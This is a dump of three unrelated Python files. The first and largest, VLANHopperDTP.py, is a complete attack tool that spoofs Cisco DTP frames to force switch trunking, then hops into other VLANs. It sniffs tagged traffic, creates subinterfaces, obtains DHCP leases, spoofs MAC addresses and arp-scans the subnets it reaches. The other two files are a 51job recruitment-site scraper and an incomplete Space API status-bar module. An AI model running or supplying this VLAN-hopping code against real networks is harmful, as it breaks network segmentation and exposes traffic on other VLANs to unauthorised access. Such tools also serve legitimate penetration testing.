| source | python |
|---|---|
VLANHopperDTP.py
|
#!/usr/bin/python
#
# This script performs DTP Trunk mode detection and a VLAN Hopping
# attack automatically, running a sniffer afterwards to collect traffic
# from any other available VLAN.
#
# This script works best in a Unix/Linux environment, as it utilizes the
# following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
# - dhclient
# - (optional) arp-scan
#
# However, it should also work on non-Unix/Linux platforms, or on platforms not
# offering the aforementioned dependencies. Under such circumstances the tool
# behaves as described below.
#
# If the underlying system is not equipped with 8021q.ko and the vconfig command,
# the script will be unable to create subinterfaces for discovered VLANs, which
# also means no DHCP leases are going to be obtained. The VLAN Hopping attack
# may still be attempted; it will result in the switch passing inter-VLAN traffic
# to our interface to observe, but only passive sniffing will be possible, without
# the ability to create subinterfaces to interact with other VLAN networks.
# If that limitation is acceptable, one can pass the --force option to this script
# in order to proceed when no vconfig was found.
#
# Python requirements:
# - scapy
#
# NOTICE:
# This program uses code written by 'floodlight', which comes from here:
# https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
# - Add logic that falls back to static IP address setup when DHCP fails
# - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
# - Add automatic packet capture via tshark/tcpdump to a specified output directory
# - Add functionality to auto-scan the desired network via arp-scan
#
# Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
#
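#
# Example invocations (illustrative; see parseOptions() below for all flags):
#   ./VLANHopperDTP.py -i eth0 -v
#   ./VLANHopperDTP.py -i eth0 -f -e "arp-scan -I %IFACE %NET%CIDR &"
#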
import os
import re
import sys
import socket
import struct
import textwrap
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.4.1'
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'count' : 10,
'timeout' : 90,
'analyse' : False,
'interface' : '',
'macaddr' : '',
'inet' : '',
'origmacaddr' : '',
'commands' : [],
'exitcommands' : [],
}
arpScanAvailable = False
vconfigAvailable = False
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = {}
subinterfaces = set()
cdpsCollected = set()
tempfiles = []
#
# ===============================================
# Floodlight's afpacket definitions
#
ETH_P_8021Q = 0x8100
SOL_PACKET = 263
PACKET_AUXDATA = 8
TP_STATUS_VLAN_VALID = 1 << 4
class struct_iovec(Structure):
_fields_ = [
("iov_base", c_void_p),
("iov_len", c_size_t),
]
class struct_msghdr(Structure):
_fields_ = [
("msg_name", c_void_p),
("msg_namelen", c_uint32),
("msg_iov", POINTER(struct_iovec)),
("msg_iovlen", c_size_t),
("msg_control", c_void_p),
("msg_controllen", c_size_t),
("msg_flags", c_int),
]
class struct_cmsghdr(Structure):
_fields_ = [
("cmsg_len", c_size_t),
("cmsg_level", c_int),
("cmsg_type", c_int),
]
class struct_tpacket_auxdata(Structure):
_fields_ = [
("tp_status", c_uint),
("tp_len", c_uint),
("tp_snaplen", c_uint),
("tp_mac", c_ushort),
("tp_net", c_ushort),
("tp_vlan_tci", c_ushort),
("tp_padding", c_ushort),
]
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
recvmsg.restype = c_int
def enable_auxdata(sk):
"""
Ask the kernel to return the VLAN tag in a control message
Must be called on the socket before afpacket.recv.
"""
sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)
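# NOTE: recv() below reads both the frame and its PACKET_AUXDATA control message.
# The kernel strips the 802.1Q header from the captured payload, so whenever the
# auxdata carries a VLAN TCI, the 4-byte tag (TPID 0x8100 + TCI) is re-inserted
# right after the destination/source MAC addresses to reconstruct the tagged frame.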
def recv(sk, bufsize):
"""
Receive a packet from an AF_PACKET socket
@sk Socket
@bufsize Maximum packet size
"""
buf = create_string_buffer(bufsize)
ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
ctrl_buf = create_string_buffer(ctrl_bufsize)
iov = struct_iovec()
iov.iov_base = cast(buf, c_void_p)
iov.iov_len = bufsize
msghdr = struct_msghdr()
msghdr.msg_name = None
msghdr.msg_namelen = 0
msghdr.msg_iov = pointer(iov)
msghdr.msg_iovlen = 1
msghdr.msg_control = cast(ctrl_buf, c_void_p)
msghdr.msg_controllen = ctrl_bufsize
msghdr.msg_flags = 0
rv = recvmsg(sk.fileno(), byref(msghdr), 0)
if rv < 0:
        raise RuntimeError("recvmsg failed: rv=%d" % rv)
# The kernel only delivers control messages we ask for. We
# only enabled PACKET_AUXDATA, so we can assume it's the
# only control message.
assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)
cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
assert cmsghdr.cmsg_level == SOL_PACKET
assert cmsghdr.cmsg_type == PACKET_AUXDATA
auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101
if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
# Insert VLAN tag
tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
return buf.raw[:12] + tag + buf.raw[12:rv]
else:
return buf.raw[:rv]
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
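# DTP Status TLV values as interpreted by inspectPacket() below:
#   0x02 - access, 0x03 - desirable (default), 0x04 / 0x84 - dynamic auto,
#   0x81 - trunk, 0x83 - trunk/desirable, 0xa5 - trunk with 802.1Q forced,
#   0x42 - trunk with ISL forced.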
def inspectPacket(dtp):
tlvs = dtp['DTP'].tlvlist
stat = -1
for tlv in tlvs:
if tlv.type == 2:
stat = ord(tlv.status)
break
ret = True
if stat == -1:
Logger.fail('Something went wrong: Got invalid DTP packet.')
ret = False
elif stat == 2:
Logger.fail('DTP disabled, Switchport in Access mode configuration')
print('[!] VLAN Hopping is not possible.')
ret = False
elif stat == 3:
Logger.ok('DTP enabled, Switchport in default configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 4 or stat == 0x84:
Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x83:
Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x81:
Logger.ok('DTP enabled, Switchport in Trunk configuration')
print('[+] VLAN Hopping IS possible.')
elif stat == 0xa5:
Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
elif stat == 0x42:
Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
else:
Logger.info('Unknown DTP packet.')
Logger.dbg(dtp.show())
ret = False
if ret:
print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')
return ret
def floodTrunkingRequests():
while not stopThreads:
# Ethernet
dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)
# Logical-Link Control
llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)
        # OUI = Cisco, Code = DTP
        snap = SNAP(OUI = 0x0c, code = 0x2004)
        # DTP: Status = Access/Desirable (0x03), Type = Trunk with 802.1Q encapsulation (0xa5)
        dtp = DTP(ver = 1, tlvlist = [
            DTPDomain(length = 13, type = 1, domain = '\x00\x00\x00\x00\x00\x00\x00\x00\x00'),
            DTPStatus(status = '\x03', length = 5, type = 2),
            DTPType(length = 5, type = 3, dtptype = '\xa5'),
DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
])
frame = dot3 / llc / snap / dtp
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
send(frame, iface = config['interface'], verbose = False)
time.sleep(config['timeout'] / 3)
def engageDot1qSniffer():
global dot1qSnifferStarted
if dot1qSnifferStarted:
return
dot1qSnifferStarted = True
Logger.info('Started VLAN/802.1Q sniffer.')
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind((config['interface'], ETH_P_ALL))
enable_auxdata(sock)
print('[>] Discovering new VLANs...')
while not stopThreads:
buf = recv(sock, 65535)
pkt = Ether(buf)
if pkt.haslayer(Dot1Q):
dot1q = pkt.vlan
if dot1q not in vlansDiscovered:
print('==> VLAN discovered: {}'.format(dot1q))
vlansDiscovered.add(dot1q)
if not config['analyse']:
t = threading.Thread(target = addVlanIface, args = (dot1q, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
global attackEngaged
if stopThreads: return
if attackEngaged == False:
success = False
for dtp in dtps:
if dtp.haslayer(DTP):
if inspectPacket(dtp):
success = True
break
if success:
Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if config['force']:
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if attackEngaged:
engageDot1qSniffer()
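# Placeholders expanded in user-supplied commands (see --execute / --exit-execute):
#   %IFACE, %HWADDR, %IP, %NET, %MASK, %GW, %CIDR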
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))
if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2"))
cmd = cmd.strip()
if not noCmd:
print('[>] Launching command: "{}"'.format(cmd))
out = shell(cmd)
if forceOut:
print('\n' + '.' * 50)
print(out)
print('.' * 50 + '\n')
else:
Logger.info(out)
def launchCommands(subif, commands, forceOut = False, noCmd = False):
for cmd in commands:
launchCommand(subif, cmd, forceOut, noCmd)
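# Creates the <interface>.<vlan> subinterface via vconfig, then makes up to two
# attempts to obtain a DHCP lease with dhclient; on success the lease is recorded,
# the user-supplied commands are launched and (if available) arp-scan sweeps the
# hopped subnet.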
def addVlanIface(vlan):
global subinterfaces
global vlansLeases
global tempfiles
subif = '{}.{}'.format(config['interface'], vlan)
if not vconfigAvailable:
Logger.fail('No 8021q or vconfig available. Unable to create {} subinterface and obtain DHCP lease.'.format(subif))
return
if subif in subinterfaces:
Logger.fail('Already created that subinterface: {}'.format(subif))
return
Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))
out = shell('vconfig add {} {}'.format(
config['interface'], vlan
))
if out.startswith('Added VLAN with VID == {}'.format(vlan)):
subinterfaces.add(subif)
pidFile = tempfile.NamedTemporaryFile().name
dbFile = tempfile.NamedTemporaryFile().name
tempfiles.append(pidFile)
tempfiles.append(dbFile)
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
ret = False
for attempt in range(2):
Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
time.sleep(3)
if attempt > 0:
shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
time.sleep(3)
shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))
time.sleep(3)
ip = getIfaceIP(subif)
if ip:
Logger.dbg('Subinterface obtained IP: {}'.format(ip))
ret = True
vlansHopped.add(vlan)
vlansLeases[vlan] = (
ip,
shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
)
print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
vlan,
vlansLeases[vlan][0],
vlansLeases[vlan][1],
vlansLeases[vlan][2]
))
launchCommands(subif, config['commands'])
if arpScanAvailable:
Logger.info('ARP Scanning connected subnet.')
print('[>] Other hosts in hopped subnet: ')
launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
break
else:
Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
subif
))
time.sleep(5)
if not ret:
Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
else:
Logger.fail('Failed.: "{}"'.format(out))
def addVlansFromCdp(vlans):
while not attackEngaged:
time.sleep(3)
if stopThreads:
return
for vlan in vlans:
Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
vlan
))
t = threading.Thread(target = addVlanIface, args = (vlan, ))
t.daemon = True
t.start()
vlansDiscovered.add(vlan)
def processCdp(pkt):
global cdpsCollected
global vlansDiscovered
if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc':
return
if not hasattr(pkt, 'msg'):
return
tlvs = {
1: 'Device Hostname',
2: 'Addresses',
3: 'Port ID',
4: 'Capabilities',
5: 'Software Version',
6: 'Software Platform',
9: 'VTP Management Domain',
10:'Native VLAN',
14:'VoIP VLAN',
22:'Management Address',
}
vlans = set()
out = ''
for tlv in pkt.msg:
if tlv.type in tlvs.keys():
fmt = ''
key = ' {}:'.format(tlvs[tlv.type])
key = key.ljust(25)
if hasattr(tlv, 'val'): fmt = tlv.val
elif hasattr(tlv, 'iface'): fmt = tlv.iface
elif hasattr(tlv, 'cap'):
caps = []
if tlv.cap & (2**0) != 0: caps.append("Router")
if tlv.cap & (2**1) != 0: caps.append("TransparentBridge")
if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge")
if tlv.cap & (2**3) != 0: caps.append("Switch")
if tlv.cap & (2**4) != 0: caps.append("Host")
if tlv.cap & (2**5) != 0: caps.append("IGMPCapable")
if tlv.cap & (2**6) != 0: caps.append("Repeater")
fmt = '+'.join(caps)
elif hasattr(tlv, 'vlan'):
fmt = str(tlv.vlan)
vlans.add(tlv.vlan)
elif hasattr(tlv, 'addr'):
for i in range(tlv.naddr):
addr = tlv.addr[i].addr
fmt += '{}, '.format(addr)
wrapper = textwrap.TextWrapper(
initial_indent = key,
width = 80,
subsequent_indent = ' ' * len(key)
)
out += '{}\n'.format(wrapper.fill(fmt))
Logger.dbg('Discovered new VLANs in CDP announcement: {} = {}'.format(tlvs[tlv.type], out.strip()))
out = re.sub(r'(?:\n)+', '\n', out)
if not out in cdpsCollected:
cdpsCollected.add(out)
print('\n[+] Discovered new CDP aware device:\n{}'.format(out))
if not config['analyse']:
t = threading.Thread(target = addVlansFromCdp, args = (vlans, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
def packetCallback(pkt):
Logger.dbg('RECV: ' + pkt.summary())
if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc':
processCdp(pkt)
def sniffThread():
global vlansDiscovered
warnOnce = False
Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
config['count'], config['timeout']
))
while not stopThreads and not attackEngaged:
dtps = []
try:
dtps = sniff(
count = config['count'],
filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
timeout = config['timeout'],
prn = packetCallback,
stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
iface = config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
break
            Logger.err('Exception occurred during sniffing: ' + str(e))
if len(dtps) == 0 and not warnOnce:
            Logger.fail('It seems like there were no DTP frames transmitted.')
Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
Logger.info('\tSWITCH(config-if)# switchport mode access\n')
warnOnce = True
if len(dtps) > 0 or config['force']:
if len(dtps) > 0:
Logger.dbg('Got {} DTP frames.\n'.format(
len(dtps)
))
else:
Logger.info('Forced mode: Beginning attack blindly.')
t = threading.Thread(target = processDtps, args = (dtps, ))
t.daemon = True
t.start()
Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def changeMacAddress(iface, mac):
old = getHwAddr(iface)
print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
iface, old, mac
))
shell('ifconfig {} down'.format(iface))
shell('ifconfig {} hw ether {}'.format(iface, mac))
shell('ifconfig {} up'.format(iface))
ret = old != getHwAddr(iface)
if ret:
Logger.dbg('Changed.')
else:
Logger.dbg('Not changed.')
return ret
def assure8021qCapabilities():
global vconfigAvailable
if ('not found' in shell('modprobe -n 8021q')):
Logger.err('There is no kernel module named: "8021q".')
return False
if not shell('which vconfig'):
Logger.err('There is no "vconfig" utility. Package required: "vconfig".')
return False
shell('modprobe 8021q')
    if not shell('lsmod | grep 8021q'):
Logger.err('Could not load kernel module named "8021q".')
return False
vconfigAvailable = True
return True
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.info('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def cleanup():
if config['origmacaddr'] != config['macaddr']:
Logger.dbg('Restoring original MAC address...')
changeMacAddress(config['interface'], config['origmacaddr'])
if vconfigAvailable:
for subif in subinterfaces:
Logger.dbg('Removing subinterface: {}'.format(subif))
launchCommands(subif, config['exitcommands'])
shell('vconfig rem {}'.format(subif))
Logger.dbg('Removing temporary files...')
for file in tempfiles:
os.remove(file)
def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to a new VLAN. One can use one of the following placeholders in the command: %%IFACE (chosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning one has to append "&" at the end to let the script carry on.')
parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
#parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
    parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in a nonegotiate situation) or the operating system does not support 802.1Q through the "8021q.ko" kernel module and the "vconfig" command. In this case, the tool will only flood the wire with spoofed DTP frames, which makes it possible to sniff inter-VLAN traffic, but no interaction can be made.')
parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['analyse'] = args.analyse
config['force'] = args.force
config['interface'] = args.interface
config['commands'] = args.command
config['exitcommands'] = args.exitcommand
if args.force:
config['timeout'] = 30
return args
def printStats():
print('\n' + '-' * 80)
print('\tSTATISTICS\n')
print('[VLANS HOPPED]')
if len(vlansHopped):
print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
len(vlansHopped)
))
for vlan, net in vlansLeases.items():
print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] ))
else:
print('Did not hop into any VLAN.')
print('\n[VLANS DISCOVERED]')
if len(vlansDiscovered):
print('Discovered following VLANs ({}):'.format(
len(vlansDiscovered)
))
for vlan in vlansDiscovered:
print('- VLAN {}'.format(vlan))
else:
print('No VLANs discovered.')
print('\n[CDP DEVICES]')
if len(cdpsCollected):
print('Discovered following CDP aware devices ({}):'.format(
len(cdpsCollected)
))
for dev in cdpsCollected:
print(dev + '\n')
else:
print('No CDP aware devices discovered.')
def main(argv):
global config
global stopThreads
global arpScanAvailable
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('dtp')
load_contrib('cdp')
if not assure8021qCapabilities():
if config['force']:
Logger.info('Proceeding anyway. The tool will be unable to obtain DHCP lease in hopped networks. Only passive sniffing will be possible.')
else:
Logger.err('Unable to proceed. Consider using --force option to overcome this limitation.')
            Logger.err('In such a case, the tool will only flood the wire with spoofed DTP frames, which makes it possible\n\tto sniff inter-VLAN traffic, but no interaction can be made.\n\tThis is because the tool is unable to obtain DHCP leases for hopped networks.')
return False
if not opts.interface:
if not selectDefaultInterface():
Logger.err('Could not find suitable interface. Please specify it.')
return False
print('[>] Interface to work on: "{}"'.format(config['interface']))
config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
if not config['macaddr']:
Logger.err('Could not acquire MAC address of interface: "{}"'.format(
config['interface']
))
return False
else:
Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
config['interface'], config['macaddr']
))
config['inet'] = getIfaceIP(config['interface'])
if not config['inet']:
Logger.fail('Could not acquire interface\'s IP address! Proceeding...')
oldMac = config['macaddr']
if opts.mac:
oldMac = changeMacAddress(config['interface'], opts.mac)
if oldMac:
config['macaddr'] = opts.mac
else:
Logger.err('Could not change interface\'s MAC address!')
return False
if shell("which arp-scan") != '':
arpScanAvailable = True
else:
Logger.err('arp-scan not available: will not perform scanning after hopping.')
t = threading.Thread(target = sniffThread)
t.daemon = True
t.start()
try:
while True:
pass
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
stopThreads = True
time.sleep(3)
cleanup()
printStats()
return True
if __name__ == '__main__':
main(sys.argv)
|
QCWY.py
|
from model import Qcwy
__author__ = 'Joynice'
from utils.utils import get_header, get_time
import requests
import queue
from lxml import etree
import threading
import os
import csv
class QCWY(object):
    '''
    Qianchengwuyou (51job.com) job crawler.
    Input parameters: keyword, city, number of threads.
    Output: a CSV file.
    '''
def __init__(self, keyword, city='北京', thread=10, path=os.getcwd()):
self.keyword = keyword
self.city = city
self.thread = thread
self.csv_header = ['职位名称', '详细链接', '公司名称', '工作地点', '薪资', '发布时间', '职位信息', '公司信息']
self.baseurl = 'https://search.51job.com/list/'
self.header = get_header()
self.path = path
self.pagequeue = queue.Queue()
self.jobqueue = queue.Queue()
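    # area_array_c.js maps six-digit city codes to city names; the slice below
    # returns the six characters immediately preceding the city name, i.e. the
    # code that 51job expects in its search URLs.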
def _get_city_code(self):
url = 'https://js.51jobcdn.com/in/js/2016/layer/area_array_c.js'
req = requests.get(url, headers=self.header).text
a = req.find(self.city)
return req[a - 9:a - 3]
def _get_max_page(self):
city_code = self._get_city_code()
url = self.baseurl + '{},000000,0000,00,9,99,{},2,1.html'.format(city_code, self.keyword)
req = requests.get(url=url, headers=self.header)
req.encoding = 'gbk'
html = etree.HTML(req.text)
max_page = html.xpath('//*[@id="resultList"]/div[2]/div[5]/text()')[2][3:]
for page in range(1, int(max_page) + 1):
page_url = self.baseurl + '{},000000,0000,00,9,99,{},2,{}.html'.format(city_code, self.keyword, page)
self.pagequeue.put(page_url)
def Spider(self):
while not self.pagequeue.empty():
url = self.pagequeue.get()
            print('Crawling: {}'.format(url))
req = requests.get(url, headers=get_header())
req.encoding = 'gbk'
html = etree.HTML(req.text)
for i in range(4, 54):
try:
title = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@title'.format(i))
                    if not title:
                        break
name = html.xpath('//*[@id="resultList"]/div[{}]/span[1]/a/text()'.format(i))
url = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@href'.format(i))
print(url[0])
area = html.xpath('//*[@id="resultList"]/div[{}]/span[2]/text()'.format(i))
salery = html.xpath('//*[@id="resultList"]/div[{}]/span[3]/text()'.format(i))
time = html.xpath('//*[@id="resultList"]/div[{}]/span[4]/text()'.format(i))
req1 = requests.get(url[0], headers=get_header())
req1.encoding = 'gb2312'
html1 = etree.HTML(req1.text)
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]//*/text()'))
if detail.isspace():
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]/text()'))
print(detail)
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]/text()'))
if gongsi.isspace():
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]//*/text()'))
jobDetail = Qcwy()
jobDetail.title = title[0]
jobDetail.url = url[0]
jobDetail.company_name = name[0]
jobDetail.area = area[0]
jobDetail.salery = salery[0] if len(salery)!=0 else None
jobDetail.time = time[0]
jobDetail.detail = detail
jobDetail.company_info = gongsi
jobDetail.city = self.city
jobDetail.key_word = self.keyword
if len(salery) > 0:
salary = salery[0]
saleryArray = salary.split("-", 1)
if (len(saleryArray) >= 2):
saleryMin = saleryArray[0]
saleryMax = saleryArray[1]
jobDetail.salery_max = saleryMax
jobDetail.salery_min = saleryMin
# jobDetail.save()
data = {
"职位名称": title[0],
"详细链接": url[0],
"公司名称": name[0],
"工作地点": area[0],
"薪资": salery[0] if len(salery)!=0 else None,
"发布时间": time[0],
"职位信息": detail,
"公司信息": gongsi
}
self.jobqueue.put(data)
except:
continue
def run(self):
self._get_max_page()
thread_list = []
for i in range(self.thread):
t = threading.Thread(target=self.Spider)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
t.join()
        if os.path.exists(self.path):
            data_list = []
            self.path = os.path.join(self.path, 'save-data')
            # make sure the output directory exists before writing the CSV file
            if not os.path.exists(self.path):
                os.makedirs(self.path)
            while not self.jobqueue.empty():
                data_list.append(self.jobqueue.get())
with open(os.path.join(self.path, '前途无忧招聘_关键词_{}_城市_{}.csv'.format(self.keyword, self.city)), 'w',
newline='', encoding='utf-8-sig') as f:
f_csv = csv.DictWriter(f, self.csv_header)
f_csv.writeheader()
f_csv.writerows(data_list)
if __name__ == '__main__':
a = QCWY(keyword='早教', city='南宁').run()
|
spaceapi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0111,R0903
"""Displays the state of a Space API endpoint
Space API is an API for hackspaces based on JSON. See spaceapi.io for
an example.
Requires the following libraries:
* requests
Parameters:
* spaceapi.url: String representation of the api endpoint
* spaceapi.format: Format string for the output
Format Strings:
* Format strings are indicated by double %%
    * They represent a leaf in the JSON tree, layers separated by '.'
* Boolean values can be overwritten by appending '%true%false'
in the format string
* Example: to reference 'open' in '{'state':{'open': true}}'
you would write '%%state.open%%', if you also want
to say 'Open/Closed' depending on the boolean you
would write '%%state.open%Open%Closed%%'
contributed by `rad4day <https://github.com/rad4day>`_ - many thanks!
"""
import requests
import threading
import re
import json
import core.module
import core.widget
import core.input
import core.decorators
def formatStringBuilder(s, json):
"""
Parses Format Strings
Parameter:
s -> format string
json -> the spaceapi response object
"""
identifiers = re.findall(r"%%.*?%%", s)
for i in identifiers:
ic = i[2:-2] # Discard %%
j = ic.split("%")
# Only neither of, or both true AND false may be overwritten
if len(j) != 3 and len(j) != 1:
return "INVALID FORMAT STRING"
if len(j) == 1: # no overwrite
s = s.replace(i, json[j[0]])
elif json[j[0]]: # overwrite for True
s = s.replace(i, j[1])
else: # overwrite for False
s = s.replace(i, j[2])
return s
class Module(core.module.Module):
@core.decorators.every(minutes=15)
def __init__(self, config, theme):
super().__init__(config, theme, core.widget.Widget(self.getState))
core.input.register(self, button=core.input.LEFT_MOUSE, cmd=self.__forceReload)
self.__data = {}
self.__error = None
self.__thread = None
# The URL representing the api endpoint
self.__url = self.parameter("url", default="http://club.entropia.de/spaceapi")
self._format = self.parameter(
"format", default=" %%space%%: %%state.open%Open%Closed%%"
